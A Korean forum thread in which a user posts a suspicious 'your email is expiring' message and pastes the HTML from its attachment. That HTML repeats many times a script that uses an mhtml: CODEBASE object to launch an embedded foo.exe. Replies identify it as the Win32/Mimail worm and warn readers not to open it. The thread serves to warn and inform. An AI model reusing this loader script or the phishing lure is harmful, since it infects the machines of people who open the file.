재미있는 메일이 왔는데요~~

hopeman의 이미지

저는 kebi.com을 씁니다만, 오늘 admin@kebi.com에서 메일이 왔네요.

게다가 영문으로 작성.. 전문을 보면.

Hello there,

I would like to inform you about important information regarding your
email address. This email address will be expiring.
Please read attachment for details.

---
Best regards, Administrator
rjiraoua

요렇게 되어있고 파일도 하나 첨부 되어있군요..

message.zip 으로 압축 되어있구요.

압축을 푸니 message.html 파일이 나오네요.

수상하긴 했지만 호기심이 불일듯 발동해서

editplus로 열어 봤지요..

그랬더니 앞부분엔 이해할수 없는 바이너리 데이타가 있고

뒷부분엔 html tag들이 나오는 군요..

이것도 전문 공개...
하고 싶지만 바이너리 부분은 붙이기가 안되는 군요..

시작은 요렇게
MIME-Version: 1.0
Content-Location:File://foo.exe
Content-Transfer-Encoding: binary

MZ

~~~

바이너리 내용..
~~~
html 코드 시작..

<body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script>

이렇게 되어있네요.

가만히 보니 같은 내용의 반복..

지식이 짧은 저라 무슨 내용인지는 모르겠지만,

수상하긴 하네요...

notpig의 이미지

당연한 이야기겠지만 HTML 화일 열지마세요~~~

바이러스 혹은 백도어입니다...
HTML 화일을 보면 foo.exe 를 사용하는데
잘 기억은 안나지만..바이러스 화일이었던걸로 기억...

무엇보다...
kebi 메일은 우리나라 메일서버인데 영어로 온다는게 이상하죠???
e-mail 주소같은경우 얼마던지 속일수 있습니다...
무엇보다...우리나라는 관리자가 admin 이란 계정 잘 않씁니다...

그냥 삭제하세요~~~

cdpark의 이미지

축하합니다. 바이러스입니다. :twisted:

http://home.ahnlab.com/smart2u/virus_detail_1197.html

Win32/Mimail.worm 라는 바이러스네요. 치료 잘 하시길.

hopeman의 이미지

도움주신 분들 감사~

안철수 연구소 링크 따라 가보니 꽤 재미있는 바이러스군요.

여기선 바이러스 테스트용(?) 컴퓨터도 있겠지요?

ㅋㅋㅋ

바이러스 백신 만들려면 공부 좀 해야겠군요..

Swinginginginginginginging~~

댓글 달기

Filtered HTML

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

BBCode

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param>
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

Textile

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • You can use Textile markup to format text.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Markdown

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • Quick Tips:
    • Two or more spaces at a line's end = Line break
    • Double returns = Paragraph
    • *Single asterisks* or _single underscores_ = Emphasis
    • **Double** or __double__ = Strong
    • This is [a link](http://the.link.example.com "The optional title text")
    For complete details on the Markdown syntax, see the Markdown documentation and Markdown Extra documentation for tables, footnotes, and more.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Plain text

  • HTML 태그를 사용할 수 없습니다.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 줄과 단락은 자동으로 분리됩니다.
댓글 첨부 파일
이 댓글에 이미지나 파일을 업로드 합니다.
파일 크기는 8 MB보다 작아야 합니다.
허용할 파일 형식: txt pdf doc xls gif jpg jpeg mp3 png rar zip.
CAPTCHA
이것은 자동으로 스팸을 올리는 것을 막기 위해서 제공됩니다.